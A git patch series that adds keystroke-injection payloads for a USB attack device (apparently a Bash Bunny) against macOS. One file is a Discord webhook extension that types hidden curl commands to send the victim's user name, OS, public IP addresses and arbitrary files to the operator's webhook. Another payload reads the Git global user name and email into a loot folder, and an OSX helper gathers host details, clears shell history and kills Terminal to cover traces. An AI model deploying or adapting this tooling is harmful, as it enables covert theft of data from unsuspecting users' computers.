From 971a981c9f96971809063cd255e5542667ab6ed3 Mon Sep 17 00:00:00 2001 From: quentinlamamy Date: Mon, 31 Jul 2023 18:56:30 +0200 Subject: [PATCH 1/3] Submit Discorde exfiltration extension --- payloads/extensions/discord.sh | 86 ++++++++++++++++++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100755 payloads/extensions/discord.sh diff --git a/payloads/extensions/discord.sh b/payloads/extensions/discord.sh new file mode 100755 index 000000000..c5c96e326 --- /dev/null +++ b/payloads/extensions/discord.sh @@ -0,0 +1,86 @@ +#!/bin/bash +# +# Title: Discord Extension +# Description: Interact with discord webhook to exfiltrate text or files +# Author: quentin_lamamy +# Version: 1.0 +# Category: Extension +# +# To use this extension, you need to create a webhook on discord and get the webhook id and token +# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables +# DISCORD_WEBHOOK_ID=""" +# DISCORD_WEBHOOK_TOKEN="" + +function DISCORD() { + + case $1 in + + # @desc Initialize the exfiltration session by posting an embed message on discord with host information + # @usage DISCORD INIT + # @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension) + "INIT") + + curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN" + curl_header="Content-Type: application/json" + + Q STRING "printf '\e7'" + Q ENTER + Q STRING "curl --location '$curl_location'" + Q STRING " --header '$curl_header'" + Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\"" + Q STRING "'\${BB_HOST_OS}'" + Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\"" + Q STRING "'\${BB_HOST_IP_V4}'" + Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\"" + Q STRING "'\${BB_HOST_IP_V6}'" + Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\"" + Q STRING "'\${BB_HOST_USER}'" + Q STRING "\",\"inline\":true}]" + Q STRING "}]}'" + Q ENTER + Q STRING "printf '\e8\e[1A\e[0J'" + Q ENTER + + ;; + + "SEND") + + case $2 in + + # @desc Send a message to discord via webhook + # @usage DISCORD SEND MSG $yourMessage + "MSG") + + if [[ "$3" == *"$"* ]]; then + message="'$3'" + else + message=$3 + fi + + Q STRING "printf '\e7'" + Q ENTER + Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'" + Q ENTER + Q STRING "printf '\e8\e[1A\e[0J'" + Q ENTER + ;; + + # @desc Send a file to discord via webhook + # @usage DISCORD SEND FILE $yourFilePath + "FILE") + Q STRING "printf '\e7'" + Q ENTER + Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'" + Q ENTER + Q STRING "printf '\e8\e[1A\e[0J'" + Q ENTER + ;; + + esac + + ;; + + esac +} + +export -f DISCORD \ No newline at end of file From 5cfae30936462e81e678ec4f6d83acb6a883e464 Mon Sep 17 00:00:00 2001 From: quentinlamamy Date: Sun, 20 Aug 2023 12:06:24 +0200 Subject: [PATCH 2/3] Add github information exfiltration payload --- .../exfiltration/githubExfiltration/README.md | 30 ++++++++++ .../githubExfiltration/payload.txt | 58 +++++++++++++++++++ 2 files changed, 88 insertions(+) create mode 100644 payloads/library/exfiltration/githubExfiltration/README.md create mode 100755 payloads/library/exfiltration/githubExfiltration/payload.txt diff --git a/payloads/library/exfiltration/githubExfiltration/README.md b/payloads/library/exfiltration/githubExfiltration/README.md new file mode 100644 index 000000000..63162238f --- /dev/null +++ b/payloads/library/exfiltration/githubExfiltration/README.md @@ -0,0 +1,30 @@ +
+ +# Github Information Exfiltration +**Get Git user name and email from the Git global config and exfiltrate them** + +![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white) +![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white) + +![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black) + +
+ +banner + +# Dependency + +* OSX Extension by quentin_lamamy + +# Changelog +v1.0 : +* :tada: Release on 2023/08/20 + +# Contributing +A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues) + +# License +

Github Infos Exfiltration Payload by Quentin Lamamy is licensed under CC BY-NC-SA 4.0

+ +# Support +Buy Me A Coffee diff --git a/payloads/library/exfiltration/githubExfiltration/payload.txt b/payloads/library/exfiltration/githubExfiltration/payload.txt new file mode 100755 index 000000000..bce2553ec --- /dev/null +++ b/payloads/library/exfiltration/githubExfiltration/payload.txt @@ -0,0 +1,58 @@ +#!/bin/bash +# +# Title: OSX Payload to exfiltrate Git user name and email +# Description: Get Git user name and email from the Git global config and exfiltrate them +# Author: quentin_lamamy +# Version: 1.0 +# Category: Exfiltration +# Attackmodes: HID STORAGE +# Target OS: OSX +# Dependency: OSX Extensions +# +# Magenta solid Setup +# Yellow single blink Attack in progress +# Yellow double blink Sync +# Yellow triple blink Cleanup +# Green blink then solid Finished + +LED SETUP + +ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250 + +OSX TERMINAL OPEN + +Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)' +Q ENTER +Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt' +Q ENTER +Q STRING 'touch $lootPath' +Q ENTER + +LED ATTACK + +# Get the user name from the Git global config +Q STRING 'user_name=$(git config --global user.name)' +Q ENTER + +# Get the user email from the Git global config +Q STRING 'user_email=$(git config --global user.email)' +Q ENTER + +Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath' +Q ENTER + +# Sync +LED STAGE 2 +sync + +# Cleanup +LED STAGE 3 + +# Eject +QUACK STRING 'diskutil eject $last_mounted_volume' +QUACK ENTER +DELAY 100 + +OSX TERMINAL CLOSE + +LED FINISH \ No newline at end of file From 5ce34d68190ce89ad4e8de982e866f9d839ba5e4 Mon Sep 17 00:00:00 2001 From: Quentin Lamamy Date: Mon, 2 Sep 2024 04:38:47 +0200 Subject: [PATCH 3/3] Update OSX Extension --- payloads/extensions/osx.sh | 278 +++++++++++++++++++++++++++++++++++++ 1 file changed, 278 insertions(+) create mode 100755 payloads/extensions/osx.sh diff --git a/payloads/extensions/osx.sh b/payloads/extensions/osx.sh new file mode 100755 index 000000000..304a59f27 --- /dev/null +++ b/payloads/extensions/osx.sh @@ -0,0 +1,278 @@ +#!/bin/bash +# +# Title: OSX Extension +# Description: Allow a bunch of osx interaction +# Author: quentin_lamamy +# Version: 2.0 +# Category: Extension + +function OSX() { + + case $1 in + + "TERMINAL") + + case $2 in + + # @desc Open a terminal + # @usage OSX TERMINAL OPEN + "OPEN") + Q GUI SPACE + Q STRING terminal + Q ENTER + ;; + + # @desc Initialize the terminal + # Make the PS1 nicer (just because I like it) + # Grab Host information and store it in BB_OSX vars + # @usage OSX TERMINAL INIT + # @info This command need a focused terminal + "INIT") + + Q STRING "bash" + Q ENTER + Q STRING "clear" + Q ENTER + Q STRING "printf '\e7'" + Q ENTER + Q STRING "export PS1='\e[0;31mbashbunny>\e[m '" + Q ENTER + Q STRING 'BB_HOST_USER=$(whoami)' + Q ENTER + + Q STRING 'BB_HOST_NAME=$(hostname)' + Q ENTER + + Q STRING "BB_HOST_OS='OSX'" + Q ENTER + + Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)' + Q ENTER + + Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)' + Q ENTER + + Q STRING "printf '\e8\e[1A\e[0J'" + Q ENTER + + ;; + + # @desc Minimize the terminal + # @usage OSX TERMINAL MINIMIZE + # @info This command need a focused terminal + "MINIMIZE") + Q STRING 'printf \e[2t' + Q ENTER + ;; + + # @desc Resize the focused terminal + # @usage OSX TERMINAL RESIZE $width $height + # @param $width The terminal width + # @param $height The terminal height + # @info This command need a focused terminal + "RESIZE") + Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'" + Q ENTER + ;; + + # @desc Clear the focused terminal + # @usage OSX TERMINAL ZOOM + # @info This command need a focused terminal + "CLEAR") + Q STRING clear + Q ENTER + ;; + + # @desc Close all terminal + # @usage OSX TERMINAL CLOSE + # @info This command need a focused terminal + "CLOSE") + Q STRING history -c + Q ENTER + Q STRING killall Terminal + Q ENTER + ;; + + # @desc Change terminal window name + # @usage OSX TERMINAL NAME + # @info This command need a focused terminal + "NAME") + Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'" + Q ENTER + ;; + + esac + + ;; + + "NETWORK") + + case $2 in + + "WIFI") + + case $3 in + + # @desc Enable wifi + # @usage OSX NETWORK WIFI ENABLE + "ENABLE") + Q STRING "networksetup -setairportpower en0 on" + Q ENTER + ;; + + # @desc Disable wifi + # @usage OSX NETWORK WIFI DISABLE + "DISABLE") + Q STRING "networksetup -setairportpower en0 off" + Q ENTER + ;; + + # @desc Connect to a wifi network + # @usage OSX NETWORK CONNECT $ssid $password + # @arg Wifi SSID + # @arg Wifi Password + "CONNECT") + Q STRING "networksetup -setairportnetwork en0 $4 $5" + Q ENTER + ;; + + esac + + ;; + + "ETHERNET") + ;; + + esac + ;; + + "SESSION") + + case $2 in + + # @desc Shutdown the computer + # @usage OSX SESSION SHUTDOWN + "SHUTDOWN") + Q STRING "osascript -e 'tell app \"System Events\" to shut down'" + Q ENTER + ;; + + # @desc Restart the computer + # @usage OSX SESSION RESTART + "RESTART") + Q STRING "osascript -e 'tell app \"System Events\" to restart'" + Q ENTER + ;; + + # @desc Lock the computer + # @usage OSX SESSION LOCK + "LOCK") + Q STRING "osascript -e 'tell app \"System Events\" to sleep'" + Q ENTER + ;; + + # @desc Logout current session + # @usage OSX SESSION LOGOUT + "LOGOUT") + Q STRING "osascript -e 'tell app \"System Events\" to log out'" + Q ENTER + ;; + + "GET_USER") + #Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)" + Q STRING 'BB_OSX_USER=$(whoami)' + Q ENTER + ;; + + esac + + ;; + + "SOUND") + + case $2 in + + "PLAY") + Q STRING "afplay $3" + ;; + + # @desc Change the computer volume + # @usage OSX MISC VOLUME $volumeValue + # @arg An integer between 0 and 10 + "VOLUME") + Q STRING "osascript -e 'set Volume $3'" + Q ENTER + ;; + + esac + ;; + + "NOTIFICATION") + + case $2 in + + "CLEAR") + Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'" + Q ENTER + ;; + + "DISPLAY") + + if [ -z $6]; then + $6=${1:-"Purr"} + fi + + Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'" + Q ENTER + ;; + + esac + + + ;; + + "MISC") + + case $2 in + + # @desc Show or hide desktop icon + # @usage OSX MISC DESKTOP_ICON $action + # @arg HIDE | void + "DESKTOP_ICON") + if [ $3 == "HIDE" ]; then + Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder" + Q ENTER + else + Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder" + Q ENTER + fi + ;; + + # @desc Change wallpaper with the specified url image + # @usage OSX MISC WALLPAPER_URL + "WALLPAPER_URL") + Q STRING "cd ~/Desktop" + Q ENTER + Q STRING "curl $3 > img.bb" + Q ENTER + Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock" + Q ENTER + ;; + + # @desc Say something in the way of bigben + # @usage OSX MISC SAY + # @info Need a focused terminal + "SAY") + Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'" + Q ENTER + ;; + + esac + + ;; + + esac + +} + +export -f OSX